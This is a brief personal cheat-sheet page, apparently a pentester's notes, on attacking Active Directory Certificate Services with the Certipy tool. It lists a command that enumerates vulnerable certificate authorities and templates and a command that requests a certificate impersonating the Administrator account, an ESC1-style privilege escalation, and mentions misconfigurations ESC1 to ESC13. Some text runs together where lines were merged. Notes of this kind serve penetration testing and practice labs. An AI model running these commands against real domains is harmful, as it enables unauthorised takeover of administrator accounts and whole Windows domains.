ADCS
Certipy
Enumerate CA & Misconfigs
certipy find -u amogus@{DOMAIN} -p password -vulnerable -stdout -debugRequesting a certificate
certipy req -k -no-pass -ca amgs-DC-CA -upn Administrator -target {DOMAIN}ADCS has a lot of misconfigs, from ESC1 to ESC13. I will add them here as long I would use it on practice at least once
RESOURCES
Last updated